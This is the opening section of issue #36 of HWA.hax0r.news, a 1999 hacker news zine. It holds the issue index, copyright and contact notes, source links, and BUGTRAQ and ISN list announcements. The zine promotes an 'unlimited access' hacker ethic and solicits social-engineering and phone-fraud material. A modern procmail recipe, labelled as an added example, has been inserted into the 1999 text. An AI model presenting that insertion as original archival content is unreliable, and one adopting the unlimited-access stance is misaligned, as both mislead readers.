hwa-hn36
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 36 Volume 1 1999 Oct 3rd 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================
Today the spotlight may be on you, some interesting machines that
have accessed these archives recently...
marshall.us-state.gov
digger1.defence.gov.au
firewall.mendoza.gov.ar
ipaccess.gov.ru
gatekeeper.itsec-debis.de
fgoscs.itsec-debis.de
"your enemy is never a villain in his own eyes, keep this in mind,
it may offer a way to make him your friend if not you can kill him
without hate, and quickly."
- Unknown
(From the Sam Spade port scanner tips dialog for windows 9x)
http://www.blighty.com/products/spade/
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
The Hacker's Ethic
Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a pejorative.
Among true computer people, being called a hacker is a compliment. One of
the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:
1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
degrees, age, race, or position.
5 - You can create art and beauty on a computer.
6 - Computers can change your life for the better.
The Internet as a whole reflects this ethic.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
A Comment on FORMATTING:
I received an email recently about the formatting of this
newsletter, suggesting that it be formatted to 75 columns
in the past I've endeavoured to format all text to 80 cols
except for articles and site statements and urls which are
posted verbatim, I've decided to continue with this method
unless more people complain, the zine is best viewed in
1024x768 mode with UEDIT.... - Ed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
New mirror sites
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/
* Crappy free sites but they offer 20M & I need the space...
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.
http://www.csoft.net/~hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #36
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #36
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
`ABUSUS NON TOLLIT USUM'? This is (in case you hadn't guessed) Latin, and
loosely translated it means "Just because something is abused, it should
not be taken away from those who use it properly." This is our new motto.
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. The Real ReDATtAck poised to Attack Belgium?.....................
04.0 .. FAQ and Guide to Cracking by Mixter..............................
05.0 .. DOD Launches Computer Crime Lab .................................
06.0 .. IBM to Launch Security Chip .....................................
07.0 .. Law Firm Sued Over Possible Cyber Attack ........................
08.0 .. Danish Man Sentenced for Intrusion Attempt ......................
09.0 .. DOE to Spend $80mil on Info Security ............................
10.0 .. The Army Wants to Eliminate Passwords ...........................
11.0 .. MediaPlayer and RealPlayer send GUID's to internet sites.........
12.0 .. GTE accidentally sends unlisted numbers to telemarketers ........
13.0 .. ``Relationship Marketing?'' We have to talk......................
14.0 .. News and views from SLa5H........................................
15.0 .. Forbidden Knowledge #7 is being released.........................
16.0 .. The 'real' story behind JP and PSS as per Forbes magazine........
17.0 .. ActiveX Buffer Overruns Advisory.................................
18.0 .. CyberArmy: Wingates list.........................................
19.0 .. Internet Vigilantism A story so fantastic it just might be true..
20.0 .. Forbes calls AntiOnline's bluff..................................
21.0 .. BO2K, good or evil? The Debate Continues. .......................
22.0 .. 97bit ECC Stronger than 512bit RSA ..............................
23.0 .. DOE Loses Dough to Budget Cut....................................
24.0 .. California Proposes Email Eavesdropping Law .....................
25.0 .. Singaporean Boy Sentenced to 12 Months ..........................
26.0 .. CIA Funds Startup VC Firm .......................................
27.0 .. BO2K, NetBus, and now WinWhatWhere ..............................
28.0 .. Microsoft, Insecure or Just More Prevalent? .....................
29.0 .. Darktide Hacking Is Closed ......................................
30.0 .. NIPC Head Warns of Y2K Bug Fixes ................................
31.0 .. Better Computer Security Needs More Than Just Laws ..............
32.0 .. New NT Security List Started ....................................
33.0 .. Computer Security Dictionary Released ...........................
34.0 .. CyberWarfare - Real or Imagined? ................................
35.0 .. Theo de Raadt and OpenBSD Profiled ..............................
36.0 .. SPAM HOUSE.......................................................
37.0 .. NET-SECURITY SITE INFO...........................................
38.0 .. PCWEEKS' HACKER CHALLENGE "RIGGED" FOR NT........................
39.0 .. DUTCH "CYBERCOPS" PATROLLING THE NET.............................
40.0 .. BIKE WEB SITE HACKS ITSELF.......................................
41.0 .. ARMY STUDYING IT RECRUITMENT.....................................
42.0 .. TRUSTE OK'S HOTMAIL FIXES........................................
43.0 .. SECURE DSL TECHNOLOGY............................................
44.0 .. HACK, COUNTERHACK................................................
45.0 .. NO SAFETY IN NUMBERS.............................................
46.0 .. YAHOO! MESSENGER DoS.............................................
47.0 .. PROBLEM IN MCF40.DLL.............................................
48.0 .. US AIMS TO FIGHT ATTACKS ON FINANCIAL SYSTEMS....................
49.0 .. DIGITALBOND ON SSL...............................................
50.0 .. THE FUTURE OF AV COMPANIES.......................................
51.0 .. UNPLUGGING THE "PHONEMASTERS"....................................
52.0 .. INDIA RESPONDS TO Y2K ACCUSATIONS................................
53.0 .. ANOTHER IE 5.0 HOLE EXPOSED......................................
54.0 .. TELECOM INDUSTRY DECRIES DIGITAL WIRETAP DEADLINE................
55.0 .. FED COMPUTER SECURITY BILL HAS STRONG SUPPORT....................
56.0 .. JUSTICE DEPT. TO FUND ANTIHACKING CAMPAIGN.......................
57.0 .. COURT TO REVISIT CRYPTO RULING...................................
58.0 .. DRAM ROBBERIES...................................................
59.0 .. DON'T BLAME BO FOR SECURITY PROBLEMS.............................
60.0 .. WHY HACKING CONTESTS ARE A BAD IDEA..............................
61.0 .. NO $35 MILLION FOR DOE CYBER SECURITY............................
62.0 .. DOD SELLS NON Y2K COMPLIANT EQUIPMENT WITHOUT WARNING............
63.0 .. HATE ON GOVERNMENT WEB SITE......................................
64.0 .. MS: JUST KEEP ON PATCHING........................................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA.. .................
Ha.Ha .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
Websites;
sAs72.......................: http://members.tripod.com/~sAs72/
Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care whether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
"CC" the bugtraq reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium outside the distribution of this list may be
challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I am pleased to inform you of several changes that will be occurring
on June 5th. I hope you find them as exciting as I do.
BUGTRAQ moves to a new home
---------------------------
First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
below. Other than the change of domains nothing of how the list
is run changes. I am still the moderator. We play by the same rules.
Security Focus will be providing mail archives for BUGTRAQ. The
archives go back longer than Netspace's and are more complete than
Geek-Girl's.
The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options
will be moved transparently.
Any of you using mail filters (e.g. procmail) to sort incoming
mail into mail folders by examining the From address will have to
update them to include the new address. The new address will be:
BUGTRAQ@SECURITYFOCUS.COM
Security Focus will also be providing a free searchable vulnerability
database.
BUGTRAQ es muy bueno
--------------------
It has also become apparent that there is a need for forums
in the spirit of BUGTRAQ where non-English speaking people
or people that don't feel comfortable speaking English can
exchange information.
As such I've decided to give BUGTRAQ in other languages a try.
BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other
language you can give the other lists a try. All relevant information
from the other lists which have not already been covered here
will be translated and forwarded on by the list moderator.
In the next couple of weeks we will be introducing BUGTRAQ-JP
(Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
from Argentina <http://www.core-sdi.com/> (the folks that brought you
Secure Syslog and the SSH insertion attack).
What is Security Focus?
-----------------------
Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same
time providing a comprehensive source of security information. Aside
from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If
you are interested in viewing the staff pages, please see the 'About'
section on www.securityfocus.com.
On the community creating front you will find a set of forums
and mailing lists we hope you will find useful. A number of them
are not scheduled to start for several weeks but starting today
the following list is available:
* Incidents' Mailing List. BUGTRAQ has always been about the
discussion of new vulnerabilities. As such I normally don't approve
messages about break-ins, trojans, viruses, etc with the exception
of wide spread cases (Melissa, ADM worm, etc). The other choice
people are usually left with is email CERT but this fails to
communicate this important information to others that may be
potentially affected.
The Incidents mailing list is a lightly moderated mailing list to
facilitate the quick exchange of security incident information.
Topical items include such things as information about rootkits
new trojan horses and viruses, source of attacks and tell-tale
signs of intrusions.
To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
of:
SUBS INCIDENTS FirstName, LastName
Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.
*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online communities.
If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.
On the information resource front you find a large database of
the following:
* Vulnerabilities. We are making accessible a free vulnerability
database. You can search it by vendor, product and keyword. You
will find detailed information on the vulnerability and how to fix it,
as well as links to reference information such as email messages,
advisories and web pages. You can search by vendor, product and
keywords. The database itself is the result of culling through 5
years of BUGTRAQ plus countless other lists and news groups. It's
a shining example of how thorough full disclosure has made a significant
impact on the industry over the last half decade.
* Products. An incredible number of categorized security products
from over two hundred different vendors.
* Services. A large and focused directory of security services offered by
vendors.
* Books, Papers and Articles. A vast number of categorized security
related books, papers and articles. Available to download directly
from our servers when possible.
* Tools. A large array of free security tools. Categorized and
available for download.
* News: A vast number of security news articles going all the way
back to 1995.
* Security Resources: A directory to other security resources on
the net.
As well as many other things such as an event calendar.
For your convenience the home-page can be personalized to display
only information you may be interested in. You can filter by
categories, keywords and operating systems, as well as configure
how much data to display.
I'd like to thank the fine folks at NETSPACE for hosting the
site for as long as they have. Their services have been invaluable.
I hope you find these changes for the best and the new services
useful. I invite you to visit http://www.securityfocus.com/ and
check it out for yourself. If you have any comments or suggestions
please feel free to contact me at this address or at
aleph1@securityfocus.com.
Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
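The filter warning in the announcement above deserves a concrete recipe. The
~/.procmailrc fragment below is an added example, not part of Aleph One's
message or of the zine: it files BUGTRAQ mail from either host into one folder
by matching the Sender: header, which LISTSERV fills with the list address
(compare the `Sender: ISN Mailing List <ISN@SECURITYFOCUS.COM>` header in the
ISN announcement further down this page), rather than the From: header, which
carries the individual poster and so never identified the list reliably in the
first place. It assumes the old list address was bugtraq@netspace.org (the
announcement names only the host) and that mail is kept in mbox folders under
$HOME/Mail.

```procmail
# ~/.procmailrc (added example) -- file BUGTRAQ from the old and the new
# host into a single folder. Procmail conditions are egrep-style regexps
# and case-insensitive by default, so BUGTRAQ@SECURITYFOCUS.COM and
# bugtraq@netspace.org both match the pattern below.
MAILDIR=$HOME/Mail
LOGFILE=$MAILDIR/procmail.log
DEFAULT=$MAILDIR/inbox

# Match on Sender: (the list address) rather than From: (the poster).
# The second ':' in ':0:' requests a lockfile so two deliveries arriving
# at once cannot interleave inside the mbox file.
# bugtraq@netspace.org is the assumed pre-move address.
:0:
* ^Sender:.*bugtraq@(netspace\.org|securityfocus\.com)
bugtraq

# Anything that does not match falls through to DEFAULT.
```

Hook procmail into local delivery the way its man page describes (usually a
one-line .forward) and watch $LOGFILE for the first few list messages to confirm
they land in $MAILDIR/bugtraq before relying on the filter.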
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--[ New ISN announcement (New!!)
Sender: ISN Mailing List <ISN@SECURITYFOCUS.COM>
From: mea culpa <jericho@DIMENSIONAL.COM>
Subject: Where has ISN been?
Comments: To: InfoSec News <isn@securityfocus.com>
To: ISN@SECURITYFOCUS.COM
It all starts long ago, on a network far away..
Not really. Several months ago the system that hosted the ISN mail list
was taken offline. Before that occurred, I was not able to retrieve the
subscriber list. Because of that, the list has been down for a while. I
opted to wait to get the list back rather than attempt to make everyone
resubscribe.
As you can see from the headers, ISN is now generously being hosted by
Security Focus [www.securityfocus.com]. They are providing the bandwidth,
machine, and listserv that runs the list now.
Hopefully, this message will find all ISN subscribers, help us weed out
dead addresses, and assure you the list is still here. If you have found
the list to be valuable in the past, please tell friends and associates
about the list. To subscribe, mail listserv@securityfocus.com with
"subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
As usual, comments and suggestions are welcome. I apologize for the down
time of the list. Hopefully it won't happen again. ;)
mea_culpa
www.attrition.org
--[ Old ISN welcome message
[Last updated on: Mon Nov 04 0:11:23 1998]
InfoSec News is a privately run, medium traffic list that caters
to distribution of information security news articles. These
articles will come from newspapers, magazines, online resources,
and more.
The subject line will always contain the title of the article, so that
you may quickly and efficiently filter past the articles of no interest.
This list will contain:
o Articles catering to security, hacking, firewalls, new security
encryption, products, public hacks, hoaxes, legislation affecting
these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..
Feedback is encouraged. The list maintainers would like to hear what
you think of the list, what could use improving, and which parts
are "right on". Subscribers are also encouraged to submit articles
or URLs. If you submit an article, please send either the URL or
the article in ASCII text. Further, subscribers are encouraged to give
feedback on articles or stories, which may be posted to the list.
Please do NOT:
* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota
All of these generate messages to the list owner and make tracking
down dead accounts very difficult. I am currently receiving as many
as fifty returned mails a day. Any of the above are grounds for
being unsubscribed. You are welcome to resubscribe when you address
the issue(s).
Special thanks to the following for continued contribution:
William Knowles, Aleph One, Will Spencer, Jay Dyson,
Nicholas Brawn, Felix von Leitner, Phreak Moi and
other contributors.
ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/
ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
private list. Moderation of topics, member subscription, and
everything else about the list is solely at his discretion.
The ISN membership list is NOT available for sale or disclosure.
ISN is a non-profit list. Sponsors are only donating to cover bandwidth
and server costs.
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
